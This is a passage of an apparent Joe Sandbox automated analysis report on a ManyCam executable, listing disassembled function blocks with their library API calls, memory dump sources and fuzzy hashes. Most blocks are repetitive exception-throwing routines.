                                                                                                                                              • Part of subcall function 004CB670: _DebugHeapAllocator.LIBCPMTD ref: 004CB787
                                                                                                                                            • _DebugHeapAllocator.LIBCPMTD ref: 0041C8AC
                                                                                                                                              • Part of subcall function 0040EA00: _DebugHeapAllocator.LIBCPMTD ref: 0040EA0E
                                                                                                                                              • Part of subcall function 0040EE30: _DebugHeapAllocator.LIBCPMTD ref: 0040EE68
                                                                                                                                              • Part of subcall function 0040EE30: _DebugHeapAllocator.LIBCPMTD ref: 0040EEAA
                                                                                                                                            • _DebugHeapAllocator.LIBCPMTD ref: 0041C8EA
                                                                                                                                            • ?Load@CxImage@@QAE_NPB_WK@Z.CXIMAGECRT(00000000,00000000,.png,0041C80E,00000049,0053F620,data\images\maindlg\,00000049,?,00000000,7EC02BB4,?,0041C80E,0000000C,00000049), ref: 0041C90D
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocatorDebugHeap$Image@@Load@
                                                                                                                                            • String ID: .png$data\images\maindlg\
                                                                                                                                            • API String ID: 1315443971-2402009575
                                                                                                                                            • Opcode ID: 1ae46db1c05b4e9d5e20b3199a0bbc276ac8498851860a350528a00f3f14c102
                                                                                                                                            • Instruction ID: 95f2c906bb04f7db6848c29b7cfe536fa7cadaced1f5336b0e2a281727f52370
                                                                                                                                            • Opcode Fuzzy Hash: 1ae46db1c05b4e9d5e20b3199a0bbc276ac8498851860a350528a00f3f14c102
                                                                                                                                            • Instruction Fuzzy Hash: AD312DB1D05248EBCB04EFA5D986BDDBBB4FF18714F10452EE01577291D7746A08CBA8
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: fprintf
                                                                                                                                            • String ID: libpng warning no. %s: %s$libpng warning: %s
                                                                                                                                            • API String ID: 383729395-566911401
                                                                                                                                            • Opcode ID: 65b62045444eb78d5d87a65db8437c79585de537338a750968a56d3bcfbde8c8
                                                                                                                                            • Instruction ID: e0ab4292319692668b67a7dd27caced310a29b2d6add869bdde559447d9a2613
                                                                                                                                            • Opcode Fuzzy Hash: 65b62045444eb78d5d87a65db8437c79585de537338a750968a56d3bcfbde8c8
                                                                                                                                            • Instruction Fuzzy Hash: 55016F7150018117D3105B2CDC699BABFE5DFC1308F8844C9E4C6A77A3E6B59859C251
                                                                                                                                            APIs
                                                                                                                                            • SendMessageA.USER32(?,00000405,00000001,?), ref: 00B95ED7
                                                                                                                                            • cvError.CXCORE099(000000E5,cvSetTrackbarPos,NULL trackbar or window name,.\window_w32.cpp,00000598), ref: 00B95EFF
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorMessageSend
                                                                                                                                            • String ID: .\window_w32.cpp$NULL trackbar or window name$cvSetTrackbarPos
                                                                                                                                            • API String ID: 1924224178-4125994439
                                                                                                                                            • Opcode ID: cc48e50baa1b15bb6e6a0d656f6a5977fe27b3b1f24b502850425103ba423133
                                                                                                                                            • Instruction ID: 01105c9005d03b47ba9b790a42b0265292d4408bafe1803f4d551e62902e925e
                                                                                                                                            • Opcode Fuzzy Hash: cc48e50baa1b15bb6e6a0d656f6a5977fe27b3b1f24b502850425103ba423133
                                                                                                                                            • Instruction Fuzzy Hash: AEF0F933680F10178E32AA29AC02E6BA2D59BD0F30B0B05F9F558E7291FB21EC0147A1
                                                                                                                                            APIs
                                                                                                                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP80(vector<T> too long,7EC02BB4,?,?,?,?,?,?,?,00000000,00533079,000000FF,?,004CA363,004C9539), ref: 004AE0FD
                                                                                                                                            • std::bad_exception::bad_exception.LIBCMTD ref: 004AE111
                                                                                                                                            • _CxxThrowException.MSVCR80(?,0057CBF8), ref: 004AE11F
                                                                                                                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP80(?,0057CBF8,?,?,?,?,?,?,?,?,00000000,00533079,000000FF,?,004CA363,004C9539), ref: 004AE12E
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@ExceptionThrowstd::bad_exception::bad_exception
                                                                                                                                            • String ID: vector<T> too long
                                                                                                                                            • API String ID: 3248949544-3788999226
                                                                                                                                            • Opcode ID: ae87a26418053443f0edf2846f8f275329f855a056418cc1095f19f45bc3fa38
                                                                                                                                            • Instruction ID: 992c7d1c538af7c9c0ce4edad66a1111de3b001cb72a08a5d5271ad12714ae45
                                                                                                                                            • Opcode Fuzzy Hash: ae87a26418053443f0edf2846f8f275329f855a056418cc1095f19f45bc3fa38
                                                                                                                                            • Instruction Fuzzy Hash: CCF04FB1944648EBCB14DF94ED45FDDBB78FB14720F50426AF812A32D0DB756A08CB54
                                                                                                                                            APIs
                                                                                                                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP80(vector<T> too long,7EC02BB4,?,?,?,?,?,?,?,00000000,0052A649,000000FF,?,004304C6,?,7EC02BB4), ref: 0043080D
                                                                                                                                            • std::bad_exception::bad_exception.LIBCMTD ref: 00430821
                                                                                                                                            • _CxxThrowException.MSVCR80(?,0057CBF8), ref: 0043082F
                                                                                                                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP80(?,0057CBF8,?,?,?,?,?,?,?,?,00000000,0052A649,000000FF,?,004304C6,?), ref: 0043083E
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@ExceptionThrowstd::bad_exception::bad_exception
                                                                                                                                            • String ID: vector<T> too long
                                                                                                                                            • API String ID: 3248949544-3788999226
                                                                                                                                            • Opcode ID: e084c971732a66b90e1072e7244ee56ba224c388b66ba4f93c615bfa38d58c9c
                                                                                                                                            • Instruction ID: 84ce0209dc11d6b23fc1989ca18a4f5fc0ac43ec5a2d3810fda43137453e27bd
                                                                                                                                            • Opcode Fuzzy Hash: e084c971732a66b90e1072e7244ee56ba224c388b66ba4f93c615bfa38d58c9c
                                                                                                                                            • Instruction Fuzzy Hash: FCF0A9B1944248EBCB14DFA0ED41FDDBB78FB04720F40022AF822A32C0EB756A08CB54
                                                                                                                                            APIs
                                                                                                                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP80(vector<T> too long,7EC02BB4,?,?,?,?,?,?,?,?,00000000,00536A69,000000FF,?,004E144B,7EC02BB4), ref: 004E281D
                                                                                                                                            • std::bad_exception::bad_exception.LIBCMTD ref: 004E2831
                                                                                                                                            • _CxxThrowException.MSVCR80(?,0057CBF8), ref: 004E283F
                                                                                                                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP80(?,0057CBF8,?,?,?,?,?,?,?,?,?,00000000,00536A69,000000FF,?,004E144B), ref: 004E284E
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@ExceptionThrowstd::bad_exception::bad_exception
                                                                                                                                            • String ID: vector<T> too long
                                                                                                                                            • API String ID: 3248949544-3788999226
                                                                                                                                            • Opcode ID: dc35638380dab2938959a34dbcce56baedfc7c7e4cd6927fef2e7d6d97a3b54c
                                                                                                                                            • Instruction ID: 0a4d440cb5536f40db0fd076e9c7fc5d2a12fc606929b1cb6c9b0b09eff913f8
                                                                                                                                            • Opcode Fuzzy Hash: dc35638380dab2938959a34dbcce56baedfc7c7e4cd6927fef2e7d6d97a3b54c
                                                                                                                                            • Instruction Fuzzy Hash: B4F03CB1944648EBCB14DF94ED45B9DBB78FB14720F50426AA812A32D0DB756A08CB54
                                                                                                                                            APIs
                                                                                                                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP80(vector<T> too long,7EC02BB4,?,?,?,?,?,?,?,00000000,00528FB9,000000FF,?,00411C76,?,7EC02BB4), ref: 004128BD
                                                                                                                                            • std::bad_exception::bad_exception.LIBCMTD ref: 004128D1
                                                                                                                                            • _CxxThrowException.MSVCR80(?,0057CBF8), ref: 004128DF
                                                                                                                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP80(?,0057CBF8,?,?,?,?,?,?,?,?,00000000,00528FB9,000000FF,?,00411C76,?), ref: 004128EE
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@ExceptionThrowstd::bad_exception::bad_exception
                                                                                                                                            • String ID: vector<T> too long
                                                                                                                                            • API String ID: 3248949544-3788999226
                                                                                                                                            • Opcode ID: c780cc5cd66b70a61fb923b6734da329fed68386e0d1462283d30a24de8a1d3f
                                                                                                                                            • Instruction ID: 4f722f1132bf029aa43680a0f31b4d6b59234f2f3b0eea29470ee80f38ab1d71
                                                                                                                                            • Opcode Fuzzy Hash: c780cc5cd66b70a61fb923b6734da329fed68386e0d1462283d30a24de8a1d3f
                                                                                                                                            • Instruction Fuzzy Hash: B3F08CB1904248EBCB14DF90ED41B9DBB78FB04720F40022AB812A32C0EB756A08CB54
                                                                                                                                            APIs
                                                                                                                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP80(vector<T> too long,7EC02BB4,?,?,?,?,?,?,?,00000000,00535729,000000FF,?,004D3CB6,00000000,7EC02BB4), ref: 004D496D
                                                                                                                                            • std::bad_exception::bad_exception.LIBCMTD ref: 004D4981
                                                                                                                                            • _CxxThrowException.MSVCR80(?,0057CBF8), ref: 004D498F
                                                                                                                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP80(?,0057CBF8,?,?,?,?,?,?,?,?,00000000,00535729,000000FF,?,004D3CB6,00000000), ref: 004D499E
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@ExceptionThrowstd::bad_exception::bad_exception
                                                                                                                                            • String ID: vector<T> too long
                                                                                                                                            • API String ID: 3248949544-3788999226
                                                                                                                                            • Opcode ID: f5e9ddf57e258ff8f81d687b94cbb6babb7938dca145e5172867018050d52fb0
                                                                                                                                            • Instruction ID: 2198fcef12488e2d17d3691da39b82749544227340ee56d3737a145847e009f6
                                                                                                                                            • Opcode Fuzzy Hash: f5e9ddf57e258ff8f81d687b94cbb6babb7938dca145e5172867018050d52fb0
                                                                                                                                            • Instruction Fuzzy Hash: 21F0A9B1904648EBCB14DFA0ED41FDDBB78FB04720F40022AF822A32C0EB756A08CB54
                                                                                                                                            APIs
                                                                                                                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP80(vector<T> too long,7EC02BB4,?,?,?,?,?,?,?,00000000,00531039,000000FF,?,0048BAC3,?), ref: 0048EBCD
                                                                                                                                            • std::bad_exception::bad_exception.LIBCMTD ref: 0048EBE1
                                                                                                                                            • _CxxThrowException.MSVCR80(?,0057CBF8), ref: 0048EBEF
                                                                                                                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP80(?,0057CBF8,?,?,?,?,?,?,?,?,00000000,00531039,000000FF,?,0048BAC3,?), ref: 0048EBFE
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@ExceptionThrowstd::bad_exception::bad_exception
                                                                                                                                            • String ID: vector<T> too long
                                                                                                                                            • API String ID: 3248949544-3788999226
                                                                                                                                            • Opcode ID: 1ea01a54b671203e94099090e90c6f810493855dc45a6ce695e3d5e9399e45a7
                                                                                                                                            • Instruction ID: 92daabea73afc4e90302cbcf7baf13e44f6b9f868eface51cfc7e975ed78bb7a
                                                                                                                                            • Opcode Fuzzy Hash: 1ea01a54b671203e94099090e90c6f810493855dc45a6ce695e3d5e9399e45a7
                                                                                                                                            • Instruction Fuzzy Hash: 95F03CB1944648EBCB14DFA4ED45B9DBB78FB14720F50426AE812A32D0DB756A08CB54
                                                                                                                                            APIs
                                                                                                                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP80(vector<T> too long,7EC02BB4,?,?,?,?,?,?,?,00000000,0052CF99,000000FF,?,0044CB83,00000000), ref: 0044ED7D
                                                                                                                                            • std::bad_exception::bad_exception.LIBCMTD ref: 0044ED91
                                                                                                                                            • _CxxThrowException.MSVCR80(?,0057CBF8), ref: 0044ED9F
                                                                                                                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP80(?,0057CBF8,?,?,?,?,?,?,?,?,00000000,0052CF99,000000FF,?,0044CB83,00000000), ref: 0044EDAE
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@ExceptionThrowstd::bad_exception::bad_exception
                                                                                                                                            • String ID: vector<T> too long
                                                                                                                                            • API String ID: 3248949544-3788999226
                                                                                                                                            • Opcode ID: 5b8e1bbaaa4858481c8b052d95aae316f4802631e30b8cefb630b981b18aab31
                                                                                                                                            • Instruction ID: f5a7866f547bb55f07dc25e2db114e65ea79899798aec203e725cd6f1ff4eb0e
                                                                                                                                            • Opcode Fuzzy Hash: 5b8e1bbaaa4858481c8b052d95aae316f4802631e30b8cefb630b981b18aab31
                                                                                                                                            • Instruction Fuzzy Hash: E2F0AFB1904248EBCB14DF90ED41FDDBB78FB04720F40022AF812A32C0EB756A08CB54
                                                                                                                                            APIs
                                                                                                                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP80(vector<T> too long,7EC02BB4,?,?,?,?,?,?,?,00000000,0052A699,000000FF,?,004301A3,00000000), ref: 00430D3D
                                                                                                                                            • std::bad_exception::bad_exception.LIBCMTD ref: 00430D51
                                                                                                                                            • _CxxThrowException.MSVCR80(?,0057CBF8), ref: 00430D5F
                                                                                                                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP80(?,0057CBF8,?,?,?,?,?,?,?,?,00000000,0052A699,000000FF,?,004301A3,00000000), ref: 00430D6E
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@ExceptionThrowstd::bad_exception::bad_exception
                                                                                                                                            • String ID: vector<T> too long
                                                                                                                                            • API String ID: 3248949544-3788999226
                                                                                                                                            • Opcode ID: 4e7c7e61b8e4b61418f89952c155b68a96c666f8f64ae422fdef5ea6b294711e
                                                                                                                                            • Instruction ID: 2c432eddfbe67746ec497c333af96acf5ab7e20aac0011f52034aeffc7690669
                                                                                                                                            • Opcode Fuzzy Hash: 4e7c7e61b8e4b61418f89952c155b68a96c666f8f64ae422fdef5ea6b294711e
                                                                                                                                            • Instruction Fuzzy Hash: 43F0A9B1904248EBCB14DFA0ED41FDDBB78FB04720F40022AF822A32D0EB756A08CB54
                                                                                                                                            APIs
                                                                                                                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP80(vector<T> too long,7EC02BB4,?,?,?,?,?,?,?,00000000,00531FD9,000000FF,?,0049E8F3,?), ref: 0049EECD
                                                                                                                                            • std::bad_exception::bad_exception.LIBCMTD ref: 0049EEE1
                                                                                                                                            • _CxxThrowException.MSVCR80(?,0057CBF8), ref: 0049EEEF
                                                                                                                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP80(?,0057CBF8,?,?,?,?,?,?,?,?,00000000,00531FD9,000000FF,?,0049E8F3,?), ref: 0049EEFE
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@ExceptionThrowstd::bad_exception::bad_exception
                                                                                                                                            • String ID: vector<T> too long
                                                                                                                                            • API String ID: 3248949544-3788999226
                                                                                                                                            • Opcode ID: 164d6ffe732d9fa8baa0de175643794e8cd3c3d995353351aea268910f753e13
